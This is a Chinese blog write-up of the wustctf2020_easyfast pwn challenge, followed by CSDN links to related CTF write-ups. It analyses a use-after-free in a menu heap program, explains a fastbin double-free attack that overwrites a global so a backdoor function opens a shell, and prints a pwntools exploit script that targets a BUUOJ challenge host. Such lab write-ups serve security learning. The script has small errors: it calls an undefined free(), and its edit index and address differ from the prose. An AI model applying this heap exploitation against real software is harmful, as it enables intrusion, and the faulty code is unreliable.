wustctf2020_easyfast

最新推荐文章于 2023-03-11 20:49:48 发布
最新推荐文章于 2023-03-11 20:49:48 发布
阅读量272 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/129222960
版权

wustctf2020_easyfast

惯例先来checksec一下

请添加图片描述

开启了canary和nx的64位程序 放进ida64里看看

没啥营养的main函数 进vuln函数里看看

请添加图片描述

一个标准的菜单题vuln函数

1 添加堆 2 删除堆 3 编辑堆 4 后门函数

请添加图片描述

1 添加堆

只能申请4个堆块

首先我们输入size然后根据该size我们申请chunk 然后将malloc出来的chunk的地址放到table数组里

请添加图片描述

2 删除堆

我们会发现此处并没有将指针归零 因此存在uaf漏洞 我们可以利用该漏洞达成fastbinattack double free

请添加图片描述

3 编辑堆

向chunk中写入长度为0xFF的内容 (此处存在栈溢出)

请添加图片描述

4 后门函数

注意这里很明显是要我们篡改qword的值为0然后执行该后门函数达到获取控制权的效果

请添加图片描述

题目分析完毕开始解题

此题是一道很简单的double free题

我们先来复习一下double free的原理:

**在删除堆的时候没有对指针进行归零操作,然后重复free同一个chunk试其的fd形成一个循环 此时我们就可以通过在第二次申请该chunk的时候让同一个chunk拥有写入和执行的权限 **

因此我们先申请两个chunk:

add(0x40)
add(0x10) //此处申请0x10是为了到时侯freechunk时无需释放两次

然后释放chunk0 需要主义的是此处如果直接double free的话会出现double free报错因此我们只能用利用第一次free的chunk直接利用 利用uaf漏洞来解决

free(0) //此处形成了循环链表

此时由于chunk已在fastbin中 因此靠fd来连接 此时我们编辑chunk1的fd指针为我们需要篡改的backdoor的目标的地址-0x10(即0x602080)

edit(1,0x602080)

此时我们再创立两个大小为0x40的大小的chunk 第一个chunk的地址是我们原chunk0的地址 而后一个chunk由于fd指针被我们篡改因此误认为0x602080才是堆的地址(之所以申请0x50是因为0x602090附近的地址只有0x602088的内容为0x50

add(0x40) #idx2
add(0x40) #idx3

然后我们编辑chunk3的内容 就是再编辑0x602090开始的内容 因此我们只要编辑chunk3的内容为0x0然后再执行backdoor即可

edit(3,p64(0x0))
backdoor()
io.interactive()

成功获取到了flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3cAbkyu1-1677357228978)(C:/Users/陈东旭/AppData/Roaming/Typora/typora-user-images/1677356452548.png)]

exp:

from pwn import *
io=remote('node4.buuoj.cn',29285)
def add(size):
    io.recvuntil("choice>\n")
    io.sendline('1')
    io.recvuntil("size>\n")
    io.sendline(str(size))

def delete(idx):
    io.recvuntil("choice>\n")
    io.sendline('2')
    io.recvuntil("index>\n")
    io.sendline(str(idx))

def edit(idx,content):
    io.recvuntil("choice>\n")
    io.sendline('3')
    io.recvuntil("index>\n")
    io.sendline(str(idx))
    io.send(content)

def backdoor():
    io.recvuntil("choice>\n")
    io.sendline('4')

io.recvuntil("_\\_\\ \n")
add(0x40)
add(0x10)
free(0)
edit(0,p64(602080))
add(0x40)
add(0x40)
edit(3,p64(0))
backdoor()
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
re学习笔记(56)WUSTCTF – Re方向WP
12-21
得到flag为wctf2020{cpp_@nd_r3verse_@re_fun} WUSTCTF-re-level1 下载下来压缩包有两个文件,一个是ELF64位,一个是output.txt是程序的输出 IDA64位载入查看main函数 对19位的flag变换后输出,, 写脚本 #include ...
pwn入门小技巧
qq_36918532的博客
05-24 2593
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
zctf2016_note2,wustctf2020_easyfast
m0_57754423的博客
04-04 100
漏洞点: 思路: 通过add(0,'')绕过,实现堆溢出,got表可写,随后进行unlink即可。 exp: from pwn import * # p = process('./note2') p = remote('node4.buuoj.cn',28447) e = ELF('./note2') libc = ELF("./libc-2.23.so") atoi_got = e.got['atoi'] free_got = e.got['free'] puts_plt = e.pl.
buuctf-pwn write-ups (12)
CoLin的pwn小屋
03-11 515
buuctf pwn第93~101题
wustctf2020_easyfast(uaf)
m0_51251108的博客
11-05 496
wustctf2020_easyfast: 逆向分析: 主界面: add函数: free函数: edit函数: backdoor: 这题是libc2.23的doublefree,注意区别 引用这位师傅的回顾double free手法 在glibc2.27之前,主要是fastbin double free: fastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,
[BUUCTF]pwn - wustctf2020_easyfast (Use After Free)
半岛铁盒的博客
06-10 385
打开菜单,了解到相应的功能后,改一下名字 这个漏洞大致利用方式是这样的; 利用思路 通过double free修改chunk0的fd指针,让申请到的chunk能够覆盖到0x602090,修改1为0,最后直接调用backdoor来getshell from pwn import * #p=process('./wustctf2020_easyfast') p=remote("node3.buuoj.cn",25044) context.log_level="debug" def add(si
wustctf 2020 easyfast 做题笔记
fa1c4的blog
09-06 322
前言 一道fastbin attack (fastbin double free/ 其实BUU这题是UAF) 的题目 BUU有环境 分析过程 分析之后重命名各个函数 void sub_400ACD() { char s[8]; // [rsp+0h] [rbp-20h] BYREF __int64 v1; // [rsp+8h] [rbp-18h] unsigned __int64 v2; // [rsp+18h] [rbp-8h] v2 = __readfsqword(0x28u);
WUST-CTF2020-WP
夏日 の blog
03-29 5244
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
Flash8help_cn.part4
01-13
Flash8help_cn.part4.共有6卷,须全部下载才能解压缩。flash 教程 帮助文档 动漫 计算机
linux操作系统入门实验报告
03-09
一个关于操作系统的入门实验的报告。包括截图的结果,基本指令使用等。
23种设计模式汇集       
07-09
比较系统的讲解了软件设计的23种设计模式,各种例子都有
fastbin attack快速入门
abelxu
11-13 1048
0x01 fastbin简介 Fastbin包含0x20~0x80大小bin的数组指针,用于快速分配小堆块。fastbin按照单链表结构进行组织,相同大小的bin在同一个链表中,fd指向下一个bin,采用LIFO(Last In First Out)机制。在fastbin中,堆块的inuse标志都为1,处于占用状态,防止chunk释放时进行合并,加快小堆块的分配。 正常fastbin的使用 通过这个简单的案例来了解fastbin的单链表结构,malloc和free的过程。 #include<stdio
WUSTCTF2020 web题 --- 大人, 时代变了
qq_42436176的博客
07-19 4780
文章目录0x0 前言0x1 前端审计抓包逻辑分析解密算法0x2 验证码识别分析验证码处理特征提取0x3 代理池0x4 全部代码主体特征点0x5 题目源码前端App.tsxDrawer.tsx后端views.pyutils.pymodels.py 0x0 前言 出这个题的本意是看到CTF的web题老是PHP什么的, 感觉和现实情况有点脱节, 且对前端审计没有太大的要求, 于是出了这个"现代"一点的题. 这个题目模拟的是爬虫, 在多次请求后将会出现验证码, 再频繁访问将会封锁ip, 且网站是使用React写的,
BUUCTF:[WUSTCTF2020]爬
末初的CSDN博客
11-11 2488
https://buuoj.cn/challenges#[WUSTCTF2020]%E7%88%AC PDF文件,修改后缀为PDF,打开 删除掉这张图片,图片下面还有张图片 右键识别图片内容 77637466323032307b746831735f31735f405f7064665f616e645f7930755f63616e5f7573655f70686f7430736830707d >>> import binascii >>> binascii.unhe
[WUSTCTF2020]朴实无华 ctf
wuyaowangchuan的博客
11-10 437
[WUSTCTF2020]朴实无华 知识点: intval函数 php MD5 弱比较 tac读取文件 ${IFS}空格绕过 进入环境 robots.txt里面有东西 进去这个文件 好家伙 假的flag 就在这个页面到处看看 响应头里面又有东西 访问 朴实无华,我知道题目为啥叫朴实无华了 接下来代码审计 我电脑的编码好像有问题,中文是乱码 不过问题不大 我去复制别人的 //level 1 if (isset($_GET['num'])){ $num = $_GET['num'];
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8237
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
什么是yolov10,简单举例.md
最新发布
05-25
YOLOv10是一种目标检测算法,是YOLO系列算法的第10个版本。YOLO(You Only Look Once)是一种快速的实时目标检测算法,能够在一张图像中同时检测出多个目标。
[WUSTCTF2020]朴实无华
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值